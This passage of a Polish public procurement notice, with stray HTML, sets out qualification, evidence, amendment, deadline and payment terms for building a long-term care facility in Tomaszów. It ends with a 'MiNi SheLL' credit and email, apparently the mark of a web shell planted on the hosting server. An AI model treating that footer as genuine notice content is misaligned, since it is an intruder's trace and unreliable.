nakładają obowiązek posiadania takich uprawnień) bądź odpowiednie kwalifikacje w przypadku podmiotów zagranicznych, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia <br/> i wykształcenia niezbędnych do wykonania, dla podanego niżej stanowiska:<br/>	<br/>a) Na stanowisku projektanta i sprawdzającego branży konstrukcyjno-budowlanej<br/>- Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował: min 2 osobami, które będą uczestniczyć w realizacji zadania posiadające uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej oraz posiadają przynależność do właściwej Izby Samorządu Zawodowego.<br/>b) Na stanowisku projektanta i sprawdzającego o specjalności architektonicznej <br/>- Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował: min 2 osobami posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej oraz posiadają przynależność do właściwej Izby Samorządu Zawodowego.<br/>c) Na stanowisku projektanta i sprawdzającego branży elektrycznej, teletechnicznej i sanitarnej<br/>- Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował: min 2 osobami posiadającymi uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: <br/>- elektrycznych i elektroenergetycznych;<br/>- telekomunikacyjnych;<br/>- cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/>- oraz posiadają przynależność do właściwej Izby Samorządu Zawodowego. <br/>d) Na stanowisku Kierownika budowy oraz koordynatora pozostałych branż<br/>- Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował: min 1 osobą, która będzie uczestniczyć w realizacji zadania posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz posiada przynależność do właściwej Izby Samorządu Zawodowego.<br/>e) Na stanowisku Kierownika robót elektrycznych<br/>- Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował: min 1 osobą, która będzie uczestniczyć w realizacji zadania posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych<br/> i elektroenergetycznych oraz posiada przynależność do właściwej Izby Samorządu Zawodowego.<br/>f) Na stanowisku Kierownika robót telekomunikacyjnych<br/>- Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował: min 1 osobą, która będzie uczestniczyć w realizacji zadania posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych oraz posiada przynależność do właściwej Izby Samorządu Zawodowego<br/><br/>g) Na stanowisku Kierownika robót sanitarnych<br/>- Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował: min 1 osobą, która będzie uczestniczyć w realizacji zadania posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz posiada przynależność do właściwej Izby Samorządu Zawodowego <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia) :<br/><br/>1) w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ – w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 2) lit. a - g) SWZ.<br/>2) wykazu robót, z którego wynika, iż wykonawcy wykonali, roboty budowlane i usługi , polegające na:<br/>a) wykonaniu co najmniej jednej roboty budowlanej polegające na budowie budynku użyteczności publicznej o powierzchni zabudowy min. 400 m2 <br/><br/>b) co najmniej 1 usługę polegającą na opracowaniu dokumentacji projektowej wraz <br/>z uzyskanie decyzji pozwolenia na budowę w zakresie budowy obiektu użyteczności publicznej <br/><br/>- oraz załączy dowody potwierdzające, że ww. roboty i usługi zostały wykonane należycie, w szczególności, że zostały wykonane zgodnie z przepisami prawa i prawidłowo ukończone, sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ, w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 1) lit. a i b SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/> pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/> zawarcia umowy w sprawie zamówienia publicznego. 10.2. W przypadku Wykonawców wspólnie ubiegających się o<br/> udzielenie zamówienia: a) oświadczenia o których mowa w pkt 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie<br/> ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/> w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/> postępowaniu lub kryteriów selekcji. oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usług wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to<br/> jest podmiotowym środkiem dowodowym. c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki<br/> dowodowe, o których mowa w pkt 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt 8.3.1 SWZ<br/> składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku. 10.3. Jeżeli została wybrana<br/> oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem<br/> umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Za zgodą stron umowy dopuszczalne jest przedłużenie terminu zakończenia wykonania przedmiotu umowy w przypadku gdy zagrożone będzie dotrzymanie terminu, o którym mowa w § 3 pkt 1 umowy, w następujących sytuacjach:<br/>1) w przypadku zmian obowiązujących przepisów prawa wpływających na termin wykonania przedmiotu umowy, w tym w szczególności nałożenia na Wykonawcę obowiązku uzyskania dodatkowych decyzji administracyjnych, uzgodnień, zezwoleń, ekspertyz lub innych aktów administracyjnych niezbędnych do wykonania przedmiotu umowy, których uzyskanie nie było konieczne na etapie składania ofert,<br/>2) wystąpienie siły wyższej, (tj. działania i zamieszki wojenne, ataki terrorystyczne, klęski żywiołowe spowodowane przez burze, huragany, tajfuny, trzęsienia ziemi, ekonomiczne następstwa globalnego kryzysu finansowego, stany zagrożenia epidemicznego i inne)<br/>3) wystąpienie zmian w przepisach prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia jednej lub obu stron,<br/>4) działanie lub zaniechanie organów władzy publicznej lub instytucji, w tym zmiany urzędowych interpretacji przepisów dotyczących wykonywania lub finansowania robót budowlanych,<br/>5) przekroczenie określonych w przepisach prawa terminów wydawania decyzji, zezwoleń, itp., jeżeli nie wynika to z przyczyn leżących po stronie Wykonawcy,<br/>6) wydanie postanowienia lub decyzji o wstrzymaniu robót budowlanych, <br/>w przypadkach określonych w przepisach ustawy - Prawo budowlane,<br/>7) wydanie orzeczenia przez sąd lub inny podmiot, którego nie można było przewidzieć w chwili zawarcia umowy,<br/>8) wystąpienia zakłóceń w realizacji umowy spowodowanych koniecznością wykonywania nieprzewidzianych robót w strefie przekazanego placu budowy;<br/>9) okoliczności leżących po stronie Zamawiającego, które mają wpływ na wydłużenie czasu realizacji umowy, w szczególności opóźnień w realizacji obowiązków Zamawiającego lub innych czynności, do których wykonywania Zamawiający jest zobowiązany w ramach obowiązku współdziałania przy realizacji umowy. <br/>2. W przypadkach, o których mowa w ust. 1, za zgodą stron umowy termin wykonania przedmiotu umowy przedłuża się o:<br/>1) czas oczekiwania na wydanie dodatkowych decyzji, uzgodnień, zezwoleń, ekspertyz lub innych aktów administracyjnych niezbędnych do wykonania przedmiotu umowy, których 1) uzyskanie nie było konieczne na etapie składania ofert, a których konieczność jest skutkiem zmiany obowiązujących przepisów;<br/>2) czas trwania warunków atmosferycznych, warunków geotechnicznych, warunków geologicznych, warunków wodnych, warunków hydrologicznych, warunków terenowych, w szczególności istnienia podziemnych urządzeń, instalacji, fragmentów budowli, obiektów infrastrukturalnych lub ich części, <br/>3) czas trwania siły wyższej w zakresie mającym wpływ na termin realizacji umowy;<br/>4) czas niezbędny na dokonanie zmian w robotach budowlanych, wynikających ze zmian w przepisach prawa,<br/>5) czas trwania działania lub zaniechania organów władzy publicznej lub instytucji, w tym czas niezbędny na dokonanie zmian w robotach budowlanych, wynikających ze zmian urzędowych interpretacji przepisów dotyczących wykonywania lub finansowania robót budowlanych,<br/>6) czas równy przekroczeniu określonych w przepisach prawa terminów wydawania decyzji, zezwoleń, itp.,<br/>7) czas wstrzymania robót budowlanych na podstawie wydanego postanowienia lub decyzji o wstrzymaniu robót budowlanych, w przypadkach określonych w przepisach ustawy - Prawo budowlane,<br/>8) czas oczekiwania na wydanie orzeczenia przez sąd lub inny podmiot, którego nie można było przewidzieć w chwili zawarcia umowy, w zakresie mającym wpływ na czas realizacji umowy,<br/>9) czas trwania zakłóceń wynikających z wystąpienia wcześniej nieprzewidzianych robót w strefie przekazanego placu budowy,<br/>10) czas trwania okoliczności leżących po stronie Zamawiającego. <br/>Ze względu na ograniczenia ilości znaków pełna treść zmian do umowy zawarta jest w projekcie umowy - załącznik nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-27 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-27 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pełna nazwa zamówienia: Wykonanie dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji administracyjnych oraz rozbudowa, przebudowa oraz modernizacja obiektu w ramach zadania pn.: Rozwój opieki wspierającej na terenie powiatu tomaszowskiego poprzez utworzenie zakładu opieki długoterminowej- „BEZPIECZNA PRZYSTAŃ” w Tomaszowskim Centrum Zdrowia Sp. z o.o.- w systemie zaprojektuj i wybuduj&#34;<br/><br/>Wizja lokalna.<br/>Zamawiający wymaga – przed złożeniem oferty - odbycie wizji lokalnej przyszłego terenu robót, co pozwoli Wykonawcom na sprawdzenie miejsca robót oraz warunków związanych z wykonaniem prac będących przedmiotem zamówienia. Wizję lokalną należy przeprowadzić przy udziale przedstawiciela Zamawiającego - po uprzednim zgłoszeniu chęci odbycia wizji na adres email: zaopatrzenie@tcz.com.pl<br/>tel.: (44) 7257 - 213 i otrzymaniu zwrotnie potwierdzenia możliwości odbycia wizji ze strony Zamawiającego. Wizji można dokonywać w dniach roboczych (od poniedziałku do piątku) w godzinach od 8:00 do 14:00). <br/><br/>4.4 Sposób i warunki płatności:<br/>Rozliczenie ryczałtowe, Zamawiający przewiduje trzy płatności w dwóch zakresach <br/>w zakresie zaprojektuj będzie wynosić – do 3.% z kwoty umownej – jedna płatność po złożeniu kompletnego wniosku o wydanie decyzji pozwolenia na budowę. <br/>w zakresie wybuduj - będzie wynosić łącznie do 97 % kwoty umownej – dwie płatności <br/>w trakcie realizacji robót budowlano – instalacyjnych wraz z wyposażeniem meblowym oraz po złożeniu kompletnego wniosku na uzyskanie decyzji na użytkowanie ( ostatnia płatność).<br/>Uwaga <br/>Płatność za poszczególne etapy ( od ….do…) w roku 2025 i 2026 nastąpi w terminie nie dłuższym niż 30 dni od dnia doręczenia Zamawiającemu prawidłowo wystawionych przez wykonawcę faktur częściowych i końcowej.<br/>Podstawę do wystawienia faktury częściowej/końcowej stanowić będzie protokół częściowy/końcowy robót zaakceptowany przez osobę upoważnioną przez Zamawiającego.<br/>Harmonogram płatności wykonawca sporządzi w porozumieniu z Zamawiającym i dostarczy go przed podpisaniem umowy, który będzie stanowił załącznik do niniejszej Umowy. W mie będzie się znajdował zakres prac projektowych – zaprojektuj oraz pozostały zakres robót budowlanych wraz z instalacjami oraz wyposażeniem meblowym. <br/>Wykonawca opracowując harmonogram rzeczowo-finansowy zobowiązany będzie uwzględniać wytyczne Zamawiającego co do sposobu finansowania wynikającego z zasad dotacji. Dopuszczalne są zmiany harmonogramu wynikające w szczególności ze zmian wynikających z cen złożonych ofert lub zmian wprowadzonych przez KPO jednostkę dofinansującą.<br/>16.3. Cenę należy obliczyć:<br/>a) podając cenę brutto stanowiącą sumę wartości netto i wysokości podatku VAT. Należy podać osobno cenę za prace projektowe oraz cenę za roboty budowlane i pozostałe świadczenia. Uwaga: Cena za prace projektowe nie może przekroczyć 3% łącznej ceny ryczałtowej zamówienia. W przypadku, gdy Wykonawca wskaże w formularzu oferty cenę za prace projektowe wyższą niż 3% łącznej ceny ryczałtowej zamówienia, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt. 5) ustawy Pzp.<br/>Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t. j. Dz. U. 2024 r., poz. 507 z późn. zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com